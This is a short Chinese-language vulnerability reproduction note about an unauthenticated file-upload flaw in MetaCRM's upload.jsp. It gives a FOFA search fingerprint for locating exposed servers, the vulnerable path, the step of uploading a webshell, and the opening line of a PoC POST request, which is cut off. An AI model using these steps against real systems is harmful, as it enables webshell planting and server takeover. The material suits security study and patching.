0x01 产品简介
MetaCRM是一款智能平台化CRM软件,通过提升企业管理和协同办公,全面提高企业管理水平和运营效率,帮助企业实现卓越管理。美特软件开创性地在CRM领域中引入用户级产品平台MetaCRM V5/V6,多年来一直在持续地为客户创造价值,大幅提升了用户需求满足度与使用的满意度。针对成长型企业,美特软件用先进的CRM产品与技术,开发了适合中小型企业的产品“美客宝”,以及面向云计算的在线CRM系统。
0x02 漏洞概述
美特CRM upload.jsp接口存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传恶意后门文件,执行任意指令,从而获取服务器权限。
0x03 复现环境
FOFA:body="/common/scripts/basic.js"
0x04 漏洞复现
漏洞路由位置:http://your-ip//develop/systparam/softlogo/file2.jsp
出现文件上传接口则存在漏洞
上传webshell,点提交抓包
PoC
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle&
